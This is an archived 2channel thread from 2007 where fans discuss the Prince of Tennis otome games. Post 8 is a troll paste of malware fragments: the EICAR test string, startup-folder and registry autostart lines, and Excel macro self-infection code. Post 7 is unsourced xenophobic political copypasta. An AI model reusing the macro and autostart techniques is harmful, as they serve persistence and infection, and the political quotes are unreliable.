5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

乙女@テニスの王子様シリーズ part31

1 :名無しって呼んでいいか?:2007/09/23(日) 17:33:17 ID:???
ここは「テニスの王子様の総合スレ」です
ドキドキサバイバル・学園祭の王子様・RUSH&DREAM・SWEAT&TEARS1,2について語りましょう
最強チーム・Smash Hit等の一般ゲームについては萌え話のみで、攻略質問ならば下部の攻略スレへ
次スレは>>970の人が立てて下さい
970過ぎたら次スレ立つまで雑談は控えてください

【禁止事項】
○隔離の話題・コピペ禁止
○主人公論争駄目
○WJ原作ネタバレは禁止(ゲーム情報のみOK)
○夢小説・過度の自分語り
○キャラ×自分(主人公)系の妄想、自分(主人公)がでしゃばる妄想
※キャラメインの妄想はおk
※自分の萎えは、誰かの萌え。自分の萌えも、誰かの萎え
※NGワードと脳内スルーの対処もお願いします

テニスの王子様 公式ゲームトップページ
ttp://www.konami.jp/gs/game/tenipuri/

前スレ
乙女@テニスの王子様シリーズ part30
http://game12.2ch.net/test/read.cgi/ggirl/1183523566/


関連スレ

テニスの王子様ドキドキサバイバル攻略・ネタバレ9
http://game12.2ch.net/test/read.cgi/ggirl/1171449891/

【お通夜?】土器鯖【お葬式?】 その4
http://game12.2ch.net/test/read.cgi/ggirl/1170466222/

【一般ゲーム攻略スレ 】
■■テニスの王子様 総合攻略スレ part15■■
http://game11.2ch.net/test/read.cgi/gameover/1181473838/

【RD攻略wiki】
http://www.wikihouse.com/randd/

【学プリ攻略wiki】
http://gakupuri.gamedb.info/wiki/

2 :名無しって呼んでいいか?:2007/09/23(日) 18:01:34 ID:???
2get
>>1
スレ立て乙です

3 :名無しって呼んでいいか?:2007/09/23(日) 18:41:18 ID:???
>>1


4 :名無しって呼んでいいか?:2007/09/23(日) 19:06:52 ID:MPMilBXU
967 名前:名無しって呼んでいいか? 投稿日:2007/09/22(土) 00:57:32 ID:???
今さらながらにラシュドリはじめたんだけど 何て名前とあだ名つけたら初期値あがるんだろ?

968 名前:名無しって呼んでいいか? 投稿日:2007/09/22(土) 01:25:13 ID:???
名前 :このみ
あだ名 :たしけ

969 名前:名無しって呼んでいいか? 投稿日:2007/09/22(土) 01:43:30 ID:???
>>968 ありがとう 
明日さっそく試してみるよ 
あと話題トン切ってごめんなさい

970 名前:名無しって呼んでいいか? 投稿日:2007/09/22(土) 11:54:22 ID:???
>>968
罪深いな

結果報告に期待
そして>>1

5 :名無しって呼んでいいか?:2007/09/23(日) 19:07:43 ID:???
sage忘れ申し訳ない

6 :名無しって呼んでいいか?:2007/09/23(日) 21:58:19 ID:???
>>1
ほうら乙

7 :名無しって呼んでいいか?:2007/09/23(日) 22:17:38 ID:???
福田公式発言
-------------------
・総理になったらまずやりたいことは? 「中韓に土下座して謝りたい」
・今年の目標は? 「(中韓からの)留学生を100万人まで増やす」
(ちなみに日本の大学生は250万人。つまりキャンパスで3人見れば1人が中国人か韓国人という状態に・・・。
 すべて日本の税金で面倒を見、月に一人あたり10万以上を無料であげて育てる。何考えてるかもう意味不明。)
・年金制度の抜本改革をめぐり 「年金システムが崩壊したらどうなるか、若い人が一番心配することだ。戦争でも
 するなら話は簡単だ。ゼロからスタートするということだ」
(↑まじでこのとおりに言った。)
・少子高齢化に関して
「これからはあなたたち若い人が一生懸命考えてください。 私の将来のことじゃないんだから」
・拉致問題の被害者家族を「ご遺族」「拉致被害者家族は黙りなさい」
-----------------------------------------
メディアが福田を応援するわけ

福田は中国韓国にやさしいwのでメディアは叩かずに総理にさせる。
そして福田が作る内閣でぼろがたくさん出るはずなので、
国民が自民党はもうだれでもだめなんじゃないかと見放す時、一気に叩いて民主へ政権を移す計画。 
かくして日本は中韓にしゃぶりつくされめちゃくちゃに吸い取られる。
 
安部は以下のようなメディア改革をやろうとしてメディアに叩かれて終わった。
 ・ 放送法改正、電波使用料値上げ
 ・ 新聞の再販制度特殊指定解除
 ・ NHK解体
 ・ スポンサーのサラ金&パチンコ=朝鮮総連の解体
福田はこれを絶対にしない真反対の立場をとっているのでメディアは叩かないのだ。

人権擁護法案
外国人参政権法案

8 :名無しって呼んでいいか?:2007/09/23(日) 22:30:36 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


9 :名無しって呼んでいいか?:2007/09/24(月) 22:08:30 ID:3Gq5baF8
>1 乙華麗

10 :名無しって呼んでいいか?:2007/09/25(火) 15:45:35 ID:???
乙女@庭球王子シリーズ隔離3
http://sakura02.bbspink.com/test/read.cgi/pinknanmin/1147342893/

11 :名無しって呼んでいいか?:2007/09/25(火) 16:40:09 ID:???
全年齢板にpink板のスレを貼るな

12 :名無しって呼んでいいか?:2007/09/27(木) 14:54:23 ID:???
ほしゅ

13 :名無しって呼んでいいか?:2007/09/29(土) 16:06:34 ID:???
乙女ゲーもう出ないらしい

14 :名無しって呼んでいいか?:2007/09/29(土) 16:57:13 ID:???
ソースは?

15 :名無しって呼んでいいか?:2007/09/29(土) 22:25:51 ID:???
ソースなんてあるわけがない
ガセ載せるなよ
それにしても廃れてるな

16 :名無しって呼んでいいか?:2007/09/29(土) 22:59:15 ID:???
ここのスレを参考に最近学プリ買った私が通りますよ。

手塚・跡部・不二・千石・忍足と終わってから、向日・大石やったら
後者2名の中学生らしさに微笑ましくなった。
特に跡部・千石・忍足あたりは強烈すぐるww

人数多いだけに色々なタイプの反応が見れて楽しい。
1人だけを目当てに買うなら物足りないかもしれんが、
私は買ってよかったよ、ありがとう。
立海攻略に行ってきますノシ

17 :名無しって呼んでいいか?:2007/09/30(日) 14:51:16 ID:???
>>16
そのレスを見て久しぶりにプレイした私も来ましたよ

赤也を攻略できなくて、何故だorzと悩んでいたら、幸村部長に電話番号を
教えていたからだった…
最初からやり直しだ

18 :名無しって呼んでいいか?:2007/09/30(日) 19:41:05 ID:???
私も最近学プリ買ったんだけど好きなキャラが一気に増えた
原作を途中で見るの止めたから知らないキャラ多かったのに短時間でできるからチャレンジしやすいよね。
んでRDも買おうと思ったら出てない……orz
好きになったキャラの大半が出てないという悲劇

19 :名無しって呼んでいいか?:2007/09/30(日) 21:57:53 ID:???
ラバーが攻略できた経験がある人はまだいいさ…。
私のラバー、アヒルきゅんはまだ攻略不可認定。
DSは乙女ゲームじゃないみたいだけど、その次あたりの乙女ゲームでは
アヒルの時代がくると!そう思っとります。

20 :名無しって呼んでいいか?:2007/09/30(日) 22:50:37 ID:???
木更津‥。・゚・(ノД`)・゚・。

21 :名無しって呼んでいいか?:2007/09/30(日) 23:28:03 ID:???
カードハンター試合中放置してると台詞つくの今日初めて知った
金田が大丈夫ですか?待ってますからとか喋り出して
危うくお皿割りそうになったよw
やばい最萌えに罵られたりしたら萌え死ぬ…

22 :名無しって呼んでいいか?:2007/09/30(日) 23:30:25 ID:???
ちょ、おまいさん漏れにカードハンター買わせる気だろwww

23 :名無しって呼んでいいか?:2007/10/01(月) 01:14:00 ID:???
自分はそういうの目当てに買ったので無問題

24 :名無しって呼んでいいか?:2007/10/01(月) 02:09:19 ID:???
>>21
札狩りは買う気なかったのに……orz
明日は早起きしてゲーム屋までチャリを飛ばすよ

25 :名無しって呼んでいいか? :2007/10/01(月) 11:25:09 ID:???
札狩り初回未開封大量に
秋葉のソフで980円で売ってたよ…

26 :名無しって呼んでいいか?:2007/10/01(月) 15:13:55 ID:???
ああ…やっぱり捌けなかったんだな。奥でも2千円だった
良く出来てるだけに惜しいね、ファンにはチャンスだろうけど

27 :名無しって呼んでいいか?:2007/10/01(月) 15:16:25 ID:???
ちょっと購入検討してみるか

28 :名無しって呼んでいいか?:2007/10/01(月) 15:19:11 ID:???
そんなに安くなっているのか
札狩面白いよ意外な萌もあったりするし

29 :21:2007/10/01(月) 16:44:04 ID:???
皆興味持ってくれて良かったよ。攻略手間取ってるから
ダーネと木更津の台詞確認できないのが残念だけどな(´・ω・`)

30 :名無しって呼んでいいか?:2007/10/01(月) 18:40:42 ID:???
札狩の話題につられて来ましたよ

>>21
漏れはわざと待たせてせりふ楽しんでるw
最初「気にしなくていい」とか言っていた手塚が
だんだんいらいらしてきたような感じになるのが禿萌えた
ぼっさまは予想通り気が短かったしw


31 :名無しって呼んでいいか?:2007/10/01(月) 19:40:28 ID:???
札狩は待たせた時のセリフも楽しかったが
個人的にはポイントカード引いたり引かれたりのセリフが面白かったな。
自分が負けてると自分の所属校の面々が応援してくれるが
相手キャラの所属校の面々からは罵倒される羽目に・・・。
珍しく仁王に褒められたときは嬉しかったが
幸村に罵倒された時は死ぬかと思った。
恐怖的な意味で。

32 :名無しって呼んでいいか?:2007/10/01(月) 20:12:19 ID:???
おお、負けていると応援と野次が入るのか
いつもポイントとカード欲しさに相手に1ポイントも
引かせないようにしているからシランカッタorz
もう1週目終わるんだが、もったいないことしたな
今度試してみるよ

33 :名無しって呼んでいいか?:2007/10/01(月) 20:54:06 ID:???
ポイントカードが残り一枚になると応援と野次がくるよ
札狩はとにかくミニキャラが可愛いな

34 :名無しって呼んでいいか?:2007/10/01(月) 23:17:32 ID:???
DS新作は乙女ゲーじゃないようだから置いといて
次の乙女ゲーってどんなベースでくると思う?
皆さんの予想聞かせてください。
個人的にはスキー合宿の王子様を遊びたいっすw
スキーウェアに萌えてしまうんです。
意外にファッショナブルで面白いw
希望としては年間通しての学園物だけど、それを期待できるかどうか。

35 :名無しって呼んでいいか?:2007/10/01(月) 23:31:03 ID:???
その発想はなかったが
ある意味全員で比嘉メンバーをいじり倒す話になりそうだなw

36 :名無しって呼んでいいか?:2007/10/02(火) 20:12:40 ID:???
ttp://www.sp-net.ne.jp/solio/detail.php?IID=47543
>ブロマイドに記載されているパスワードを
DSソフト「テニスの王子様 Driving Smash! side Genius」に入力すると
キャラクターからのメッセージが聞けたり、ゲーム内で使用出来るアイテムが入手できます。

37 :名無しって呼んでいいか?:2007/10/03(水) 00:52:04 ID:???
>>36
あくどいな!!
メッセージという事は女ゲーマー取り込むための商法か?

38 :名無しって呼んでいいか?:2007/10/03(水) 08:16:40 ID:???
自分の好きキャラは出なそうだ

39 :名無しって呼んでいいか?:2007/10/03(水) 21:01:56 ID:???
>>36
なんという抱き合わせ商法

40 :名無しって呼んでいいか?:2007/10/03(水) 22:32:41 ID:???
どうみても女性ファン狙いですありがとうございました
連載終了前に精一杯稼ぐためにコナミ必死だな

41 :名無しって呼んでいいか?:2007/10/04(木) 00:14:29 ID:???
>>36
そのアイテムも、ブロマイドのパスでしか入手できない特殊アイテムとかだったらひどすぐる

42 :名無しって呼んでいいか?:2007/10/04(木) 11:08:45 ID:???
一瞬くやしい・・・でも買っちゃう・・・ビクッ
になるかと思ったけど正直カードの人選待ちだな

43 :名無しって呼んでいいか?:2007/10/04(木) 13:51:56 ID:???
べ様誕生日おめ。

44 :名無しって呼んでいいか?:2007/10/04(木) 19:56:53 ID:???
>>39
抱き合わせ商法じゃないだろwww
ソフトと一緒に売るならそうだけどソフト別売りってかいてあるw

45 :名無しって呼んでいいか?:2007/10/04(木) 22:00:30 ID:???
そういうことじゃないと思うが

46 :名無しって呼んでいいか?:2007/10/04(木) 22:30:32 ID:???
44は抱き合わせの意味がわかってないんだろ

47 :名無しって呼んでいいか?:2007/10/05(金) 00:03:22 ID:???
44は抱き合わせの意味をあまり知らないんだな

48 :名無しって呼んでいいか?:2007/10/05(金) 00:04:30 ID:???
いや、抱き合わせ商法ってのはセットで販売する事
ソフトは別なんだから買わなくてすむ
ただパスワード?とか目当てに買わせようとしてる、連動してるだけ

49 :名無しって呼んでいいか?:2007/10/05(金) 01:02:00 ID:???
抱き合わせというか便乗商法に近いな
携帯と連動とかは他のソフトで見たことあるけど
ブロマイドとは・・・

50 :名無しって呼んでいいか?:2007/10/05(金) 01:18:28 ID:???
抱き合わせ商法と言ってるからてっきりゲーム買わなきゃコレ買えないのかと思った・・・

51 :名無しって呼んでいいか?:2007/10/05(金) 09:09:07 ID:???
とにかくゲームもカードも売れ行きやばいってのは伝わってきた

52 :名無しって呼んでいいか?:2007/10/05(金) 09:20:16 ID:???
>>45-47
意味分かってないで使ってるやついるんだな。正直驚いた

そんな自分は某掲示板でいつも2チャンの情報書いてる奴見て来たw
25以上のくせに恥ずかしい奴、迷惑なんだけど
消えて

53 :名無しって呼んでいいか?:2007/10/05(金) 12:58:56 ID:???
>>51
お店でカードハンターがお粗末扱いされてて泣けてくる(´・ω・`)ショボーン

54 :名無しって呼んでいいか?:2007/10/05(金) 16:11:38 ID:???
>>52
日本語でおk

55 :名無しって呼んでいいか?:2007/10/05(金) 17:33:12 ID:???
>>52
本人なら分かるんじゃね
本人じゃなきゃヌルー

56 :名無しって呼んでいいか?:2007/10/05(金) 17:34:44 ID:???
間違えた>>54

57 :名無しって呼んでいいか?:2007/10/06(土) 13:00:17 ID:???
公式にも更新来てたけどDS新作のGeniusは青学・四天宝寺・不動峰で確定らしい。
となるとKingは氷帝・立海・六角・山吹・比嘉かな?
不動峰はキャラ削られて橘さんと神尾しかいなかったが
King側の学校もキャラ削られるんだろうか・・・。

58 :57:2007/10/06(土) 13:01:14 ID:???
ルドルフ抜かしてたOTL
しかしこれ本当に全学校出られるのかわからんな。

59 :名無しって呼んでいいか?:2007/10/06(土) 13:02:33 ID:???
>>57
そうなると私はKingだけの出費ですむな…
まさか立海と氷帝をまとめてくれるとは思わなかった
ありがとう573

60 :名無しって呼んでいいか?:2007/10/06(土) 13:19:18 ID:???
なんだかんだで結局両方買わなきゃいけないような仕様になる予感…

61 :名無しって呼んでいいか?:2007/10/06(土) 13:30:05 ID:???
蓮二削られたらどうしようorz

62 :名無しって呼んでいいか?:2007/10/06(土) 13:44:08 ID:???
え?ジーニアスの方はこれで確定なのか?
ジャンプで「さらなる驚きの参加選手は続報を待て」とか書いてあるからこれだけじゃないと思ったんだが

63 :名無しって呼んでいいか?:2007/10/06(土) 13:52:14 ID:???
まあ確かにGeniusのキャラはまだ全員発表されてないだけかもしれないが
というかこれだけだったらkingの方が学校とキャラ詰め込みすぎになるしな。削る可能性もあるけど

ゲーム画面に跡部や忍足がいるがこれは敵オンリーなのかGeniusでも使えるのか

64 :名無しって呼んでいいか?:2007/10/06(土) 13:57:14 ID:???
>>58
ルドルフないのかと一瞬ショックを受けたw

それにしても、ジーニアスはこれだけじゃないだろ、さすがに…
伊武が削られるとは考えにくいし、いくらなんでも少な過ぎる
3校のジーニアスがこれで確定なら、キング側はどれだけ削られるんだorz

65 :名無しって呼んでいいか?:2007/10/06(土) 14:12:54 ID:???
1ソフト16人で確定とかだったら少ないので増えると信じたいが

ルドルフ:観月、裕太、赤澤、柳沢、木更津(弟)、金田
山吹:千石、亜久津、南、東方、室町、壇
氷帝:跡部、樺地、忍足、向日、鳳、宍戸、ジロー、日吉、滝
立海:幸村、真田、切原、柳、仁王、柳生、ジャッカル、丸井
六角:葵、佐伯、樹、ダビデ、黒羽、木更津(兄)
比嘉:木手、田仁志、平古場、知念、甲斐

残りの学校で最強チームに出た人間(比嘉はまだだが)を羅列したら
これだけ残っているぞ・・・どれだけリストラされるのかと今から不安だ
というか最強チーム並にキャラを出してくれると勝手に期待していた自分が
甘かったんだろうか・・・

66 :名無しって呼んでいいか?:2007/10/06(土) 15:39:26 ID:???
Kingの方はキャラ削り激しそうだ

67 :名無しって呼んでいいか?:2007/10/06(土) 17:54:04 ID:???
小春でおバカテニヌができる…そう信じて疑っていませんでしたorz

68 :名無しって呼んでいいか?:2007/10/06(土) 17:54:20 ID:???
恒例の隠しキャラ、咲乃とミチルが出ますように……って無理?

69 :名無しって呼んでいいか?:2007/10/06(土) 18:05:51 ID:???
ルドルフ山吹あたりは学校ごと削られそうな気すらしてきた…

70 :名無しって呼んでいいか?:2007/10/06(土) 18:09:47 ID:???
公式で特典つきの特別版が出るようだね
+ブロマイドも同梱すると各1万円越えってorz

71 :名無しって呼んでいいか?:2007/10/06(土) 19:09:22 ID:???
>>69
うわあああああああああああああああorz

72 :名無しって呼んでいいか?:2007/10/06(土) 19:18:22 ID:???
多分出るであろう氷帝と立海のレギュラーメンバーだけで
16人埋まるもんな…本当に16枠しかないならならそれすら何人削られるのやら

人気低キャラ萌えの自分は情報見てからこりゃ出ないかもなと覚悟したが
「さらなる驚きの参加選手は続報を待て」に一縷の望みを託したい…

73 :名無しって呼んでいいか?:2007/10/06(土) 19:26:24 ID:???
あ、そうか。続報があるのか。
ならそれに期待したい・・・。
いくらなんでもキャラ少なすぎるよな。
kingの続報だけだったら泣くorz

74 :名無しって呼んでいいか?:2007/10/06(土) 19:41:32 ID:???
青学、四天、不動峰:ルドルフ、山吹、氷帝、立海、六角、比嘉=3校:6校
これじゃGeniusとkingの差が凄すぎてkingがどれだけパンパンなんだよっていう
ことになるから流石にGeniusにあと2校くらいは増やしそうだけどなあ

しかし普通だったら分割商法って叩かれるのにテニスはそういうのみんなわりと寛容だよね
GBAとかドキサバでもあったし慣れてるんだろうか

75 :名無しって呼んでいいか?:2007/10/06(土) 19:43:51 ID:???
慣れというより、諦めだw
キャラゲーって人数出してナンボという面もあるんだから
コナミには頑張って欲しいんだけど…

76 :名無しって呼んでいいか?:2007/10/06(土) 19:47:23 ID:???
先々週くらいのWJで神尾が「石田に教えてやろう」とか喋ってるカットが載ってたので
不動峰やその辺は最低4人は居ると思ってた。とりあえず1チーム作れるくらいには

77 :名無しって呼んでいいか?:2007/10/06(土) 20:28:52 ID:???
>>76
まさか石田って師範(ry

しかしこのまま二人だとすれば不動峰オンリーチームを作れないのか・・・寂しいなあ

78 :名無しって呼んでいいか?:2007/10/06(土) 20:44:23 ID:???
いや流石に神尾の「石田」は不動峰のほうだろww

クリスタルドライブみたいに残りの不動峰キャラや四天宝寺キャラはゲームをクリアすれば増えるとか?
流石にキャラと学校が少なすぎるし、とりあえず続報待ちだな

79 :名無しって呼んでいいか?:2007/10/06(土) 20:52:33 ID:???
まだ一度も試合描写ない謙也は出るんだな…
やっぱり人気重視ってことなのか

80 :名無しって呼んでいいか?:2007/10/06(土) 20:55:49 ID:???
謙也の試合描写はあるよ銀さんとダブルス

81 :名無しって呼んでいいか?:2007/10/06(土) 20:58:07 ID:???
>>80
ゴメン見落としてた
でもプレイスタイルとかわからないキャラはどうなるんだろう?
発売する頃には40.5巻が出てるのかな

82 :名無しって呼んでいいか?:2007/10/06(土) 20:58:15 ID:???
>>79
一応師範と対不動峰でダブルスしてたけど青学とじゃないしな
結構長い試合描写があったガチホモコンビが出ないのはまあ人気重視だろうな…

83 :名無しって呼んでいいか?:2007/10/06(土) 22:10:32 ID:???
見ればみるほど、僅かにでも乙女要素がある気がしてならない
次回作への布石だといいな
学校・学年選択を次の乙女ゲーに生かしてホシス

84 :名無しって呼んでいいか?:2007/10/06(土) 22:26:37 ID:???
16人は少なすぎるだろ・・・。
っていうか不動峰からイブを削るとはどういうこった。
まさか学校内分裂か?

85 :名無しって呼んでいいか?:2007/10/06(土) 22:45:20 ID:???
>>84
また部内分裂起こしているのかと思ったら不謹慎だがワロタ
イブ本当に出ないのかな・・・今までのゲームでは本当の
初期を除いて皆勤賞並みに出てたのでさみしいな

86 :名無しって呼んでいいか?:2007/10/06(土) 22:48:35 ID:???
好きなキャラが多いからどういう風に分けられても結局両方買ってしまうな
公式見てきたけど、とりあえず16人判明ということだよね・・・というかそうであってもほしい

87 :名無しって呼んでいいか?:2007/10/06(土) 22:49:45 ID:???
○そうであってほしい
「も」いらなかった

88 :名無しって呼んでいいか?:2007/10/06(土) 22:49:45 ID:???
最萌が山吹にいるがマジで学校ごと削られるんじゃないかと思ってる
本当に1ソフト16人ならそれに入るのは無理だよ…

89 :名無しって呼んでいいか?:2007/10/06(土) 23:08:13 ID:???
登場キャラクターの内の16人を発表したってだけだと思う
1ソフトに16人はさすがにないだろう

GBA版とかDS版みたいにやっていく内にキャラが増えるとかかな。

90 :名無しって呼んでいいか?:2007/10/06(土) 23:10:02 ID:???
正直この分け方じゃ、氷帝と立海の固まったkingと売上の佐賀出る気がしてならないんだが…
つーかイブ萌えの自分はすでに涙目で笑えない…

91 :名無しって呼んでいいか?:2007/10/06(土) 23:46:02 ID:???
マイナー校萌えの人間はこのまま戦々恐々としていなければならないのか……
氷帝や立海のファンが羨ましい

92 :名無しって呼んでいいか?:2007/10/07(日) 00:01:53 ID:???
>>91
ここにジャッカルと樺地好きな人間も戦々恐々しているので安心しろ
しかし生殺しというか本当16で打ち止めかどうかを告知して欲しいな
コナミだろうから限界まで焦らすだろうけど

93 :名無しって呼んでいいか?:2007/10/07(日) 00:33:05 ID:???
>>91
一番うらやましいのは青学
何があろうと9人キープされてる

94 :名無しって呼んでいいか?:2007/10/07(日) 01:10:18 ID:???
そうか……金田のマネージャーは夢に終わるんだ……


Geniusとkingとか輝かしいタイトルじゃなくていいから
minorを出して下さい、コナミ様

95 :名無しって呼んでいいか?:2007/10/07(日) 01:43:24 ID:???
山吹とルドルフ好きはドキサバの時も散々焦らされたな
今となってはいい思い出だが

96 :名無しって呼んでいいか?:2007/10/07(日) 09:10:56 ID:???
やっぱり通信で登場する隠しキャラいるんだな
テニ友のいない自分にどうしろとorz

97 :名無しって呼んでいいか?:2007/10/07(日) 09:47:13 ID:???
DSを二台と、ソフトをそれぞれ1本ずつあればいいんじゃね?

98 :名無しって呼んでいいか?:2007/10/07(日) 09:54:10 ID:???
今こそWifiの出番ですKONAMI

99 :名無しって呼んでいいか?:2007/10/07(日) 15:24:38 ID:???
>>94
そうか、いっそ3つに分けて販売すればいいのか
これで学校、キャラが削られる心配は無いもんな

100 :名無しって呼んでいいか?:2007/10/07(日) 17:53:56 ID:???
テニスの王子様 Driving Smash-Side Minor-

野村卓也 柳沢慎也 木更津淳 室町十次 新渡戸稲吉 喜多一馬
樹希彦 首藤聡 木更津亮 樺地崇弘 田仁志慧 新垣 不知火知弥
リリアデント・クラウザー リチャード坂田 九鬼貴一

以上16名の王子様をマネージャーとしてサポート

101 :名無しって呼んでいいか?:2007/10/07(日) 17:56:13 ID:???
>>100
福士忘れないで下さい

102 :名無しって呼んでいいか?:2007/10/07(日) 18:47:34 ID:???
Minorじゃないってことだろう

103 :名無しって呼んでいいか?:2007/10/07(日) 20:25:33 ID:???
確かにマイナーキャラだけどさ
そうやってはっきり分けられてもあまり気分は良くないな、ネタであっても

104 :名無しって呼んでいいか?:2007/10/07(日) 23:53:37 ID:???
>>83
自分も同意見!学校と学年が選べるなんて良すぎる!四天宝寺も出てくるのに育成中心なら残念すぎる。
コナミ頑張ってよ…

105 :名無しって呼んでいいか?:2007/10/08(月) 15:23:18 ID:???
ルドルフGeniusに来て欲しいな
青学ルドルフ不動峰萌えなもので
四天宝もゲーム初登場っぽいし楽しみ

106 :名無しって呼んでいいか?:2007/10/08(月) 19:30:29 ID:???
ホモペア個人的に原作では黒歴史扱いだが
こういうのには出て欲しかったな

107 :名無しって呼んでいいか?:2007/10/11(木) 01:19:46 ID:???
学年選択やマネージャーってこのスレでもよくきぼんされてたけど
まさか本当に出るなんて…
こんなんどう見ても乙女ゲーです本当に(ry

108 :名無しって呼んでいいか?:2007/10/11(木) 11:04:37 ID:???
でも真性乙女ゲームまた出して欲しいな。
いろいろ出たけどやっぱり最萌えとペア組んで
試合できるってのがいいので、テニゲーで学プリ並みの
イベントつきキボンだ。

109 :名無しって呼んでいいか?:2007/10/11(木) 12:22:32 ID:???
学校選択と学年選択ももちろんありだよね?でも乙女だとセリフ多いからそれだと
容量オーバーかな?
私としてはスマヒ・最強系のリアルタイプグラがかっこいいのでこれで試合やりたい
主人公はショート・セミロング・ロングからグラ選べるようにして、難易度設定で
自分で全部操作(スマッシュが打てる、パートナーの好感度が上がりやすいなどの特典あり)、
ラシュドリのような移動のみオート、完全オートから選べたら完璧だ

110 :名無しって呼んでいいか?:2007/10/11(木) 18:23:22 ID:???
>>108
>テニゲーで学プリ並みのイベントつき
S&T2の休日練習後イベントをデートイベントにするような感じなら
デート回数も多くなってよさそう
本命以外ともデートできるけど、その場合は本命と街で
はちあわせするイベントとかあれば楽しそうだw
もちろん特殊組み合わせでは特別会話ありでね

111 :名無しって呼んでいいか?:2007/10/11(木) 20:17:04 ID:???
とりあえずマネージャー設定をありがとうコナミ

112 :名無しって呼んでいいか?:2007/10/11(木) 22:10:47 ID:???
こうなったらDS新作かって
この素敵なシステム、学年・学校選択を
次回作(もちろん乙女ゲー)に活かして下さい!!と
米粒のような大きさの字で書き連ねるしかない。
乙女ゲーにこそ打ち出すべき要素だろ・・・。

113 :名無しって呼んでいいか?:2007/10/11(木) 22:28:39 ID:???
自分は容量食うくらいなら主人公の容姿とか細かく選べなくていいから>ときめも並の無個性でいいよもう。
むしろ攻略対象削らないで欲しい。学年選択もべつにそこまでこだわらん。
二年だとタメ、年上、年下のすべてに対応できるから無難だなとは思うが。
R&Dは楽しかったけどヒロインがヒドスwだったのであんまいい印象はないけど…
テニスしているのがよかったんで、ヒロインがテニスできなくても「おまいらテニスしry」とか思わなかったから良いな

114 :名無しって呼んでいいか?:2007/10/11(木) 22:54:58 ID:???
>>113
同じくフルボイスとか細部にこだわらなくていいからこれ以上のリストラは勘弁って感じだな
新キャラ出すだろうからにはキャラを削らざるを得ないっていうのはわからんでもないけど
一部の登場が確定されているキャラ以外のファンはビクビクしなくちゃならんしね

115 :名無しって呼んでいいか?:2007/10/12(金) 00:41:18 ID:???
ドウーイ!
好きキャラいないとやっぱ寂しい
人気キャラなんかが一番好きだと困らないんだけど、微妙にマイナー好きの自分はorz
容量はまた2パケで分けても両方買って貢献してやるから頼むよ!!!

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)